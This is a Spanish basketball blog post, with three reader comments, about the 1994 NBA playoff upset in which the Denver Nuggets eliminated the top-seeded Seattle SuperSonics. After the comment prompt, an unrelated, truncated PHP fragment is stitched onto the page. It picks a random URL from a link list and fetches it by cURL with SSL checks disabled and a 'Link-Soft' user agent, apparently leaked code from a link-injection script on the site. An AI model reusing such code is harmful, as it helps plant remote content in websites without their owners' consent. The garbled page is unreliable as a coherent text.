No en vuestra casa

20 de September de 2012 por TheDeerHunter

Abril de 1994. Concluye la temporada regular tras la primera retirada de Michael Jordan. En ausencia de “Su Majestad”, el peso específico de la liga parece inclinarse hacia las potencias del Oeste.: Spurs, Jazz, Suns, por supuesto Rockets… Pero por encima de todos estos trasatlánticos emergían los Seattle Supersonics de George Karl, con uno de los dúos más sensacionales que haya parido el mundo del baloncesto.

Para que nos pongamos en situación, el flamante balance que han firmado los Thunder subcampeones de este año se queda lejos del 63-19 (0.768) de aquella escuadra. De hecho, quedó aún más lejos el que lograron los únicos Supersonics campeones en el 79 (52-30). Ese 63-19 es hasta la fecha el segundo mejor balance de la historia de la franquicia sólo por detrás del 64-18 que registraron ellos mismos dos cursos más tarde.

Para ser justos no conviene reducir el mérito de aquel temporadón al tridente Karl-Payton-Kemp. Aquellos Sonics eran solventes en todas sus posiciones. Kendall Gill, Detlef Schrempf y Sam Perkins completaban el quinteto, y tipos como Ricky Pierce, Vincent Askew o Michael Cage salían desde el banco. Nate McMillan aportaba sus minutos y le aguantaba la toalla a “El Guante” (ahora entendemos muchas cosas).

6 tipos en dobles figuras de reloj y, con diferencia, el mejor balance defensa-ataque de la liga jugando, además, como los ángeles. En aquel momento parecían los más claros favoritos al anillo. 

Recordemos que en aquellos tiempos la primera ronda era al mejor de 5. Será cierto que era un grano en el culo para los que se habían tomado más en serio la regular y que era casi una lotería sin margen de error pero aquella primera ronda “suicida” molaba mucho y me atrevería a asegurar que los equipos se tomaban más a muerte el resto de eliminatorias. Esa primera ronda les hacía entrar en calor desde el principio y les ahorraba un par de potenciales partidos a las piernas de los jugadores, que siempre se agradece a esas alturas de curso.

Pero además molaba más por los propios cruces. “Sólo” 27 franquicias daban para que, ganando la regular, en primera ronda te tocara una “perita en dulce” como la que repasaremos a continuación. Los Denver Nuggets:

De Chris Jackson/Mahmoud Abdul-Rauf ya hemos hablado en este blog. Le acompañaban un atípico 4 con excelente mano y rango de tiro como LaPhonso Ellis (¡qué nombre de jugón, ¡por dios!), dos notables aleros como Bryant Stith y Reggie Williams, desde el banco el malogrado Bison Dele, Rodney Rogers y Robert Pack… y la guinda era un mito congoleño de nombre excesivamente largo, que yo abreviaría en “Dikembe meto-31-tapones-en-5-partidos Mutombo”.

 

Confieso que estos tíos son los que me han motivado a repasar todo esto. Todos tenemos en mente lo que pasó, pero nos cuesta más recordar lo asombrosamente potente que era aquel equipo que se había clasificado por los pelos. 8 tíos que se podían poner en dobles figuras con la gorra, talento, físico, banquillo… No eran lo más consistente del universo, eso sí, pero vaya si no podían liársela al más pintado.

Pero aún así, aquel año era inconcebible pensar que Seattle Supersonics pudiera tener problemas. Jamás en toda la historia de la liga el mejor equipo de la regular había caído en primera ronda. Más impensable parecía con el 2-0 a favor de Sonics que señalaba el marcado de la eliminatoria tras dos cómodas victorias en casa.

Lo que vino después fue algo así como “Qué hacer en Denver cuando estás muerto” y el “miedo, tengo miedo” que decía Andrés.

El 5º partido de la serie en Seattle es un imprescindible (lo podéis ver entero en youtube). Uno de los actos más emocionantes e insólitos que hayamos presenciado en esta liga. La imagen icónica de Mutombo agarrando la bola, tumbado en el suelo. Antes de que empezara a caernos mal poniéndonos la cabeza loca por recitar su nombre en cada ocasión y el maldito dedito de “en mi casa no”… un grande. ¡Y qué partidos de Bison Dele, Robert Pack y LaPhonso!

Más tarde estarían a punto de liársela también a los Jazz de Stockton y Malone, perdiendo el 7º en esta ocasión.

Recuerdos hermosos de un equipo olvidado y, en cierto modo, maldito.

Comenta

3 comentarios a esta entrada

  1. Chipi dice:
    #1

    Jeje, me he imaginado a McMIllan en el banquillo rechinando los dientes y pensando “Ya me vengaré, ya…”

      Citar

  2. Sancho88 dice:
    #2

    Laphonso Ellis… sois unos cabrones, ahora qué hago yo con mis lágrimas nostálgicas?

    Los 90 creo que tb se han infravalorado porque una vez que se retiraron los cracks del dream team todos pensaron que se entraba en un periodo de transición, pero no sé hasta qué punto puede ser cierto eso. Yo, personalmente, recuerdo los 90 con gran nostalgia, porque es la década cuando empecé a seguir la liga. Los enfrentamientos entre Olajuwon, Pat Ewing, Larry Johnson, Karl Malone, David Robinson, etc. son míticos e inolvidables. La pintura se sudaba de cojones en esa década, que no digo que ahora no se haga, pero sobre todo había 5’s poderorísimos, una posición que está en declibe ahora mismo, en mi opinión.

    Me hubiera gustado ser más mayor en aquellos años para deleitarme con esos partidos. Es una lástima, porque en el nuevo milenio se han cargado la NBA a más de 100 puntos…

      Citar

  3. rumbero dice:
    #3

    Yo tambien soy de los que empecé en los 90 y estos articulos gustan especialmente. Genial este.
    De hecho ya voy por la parte 4 del partido en youtube solo para refrescar si Kemp molaba tanto y volver a ver al crack de Abdul-Rauf.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>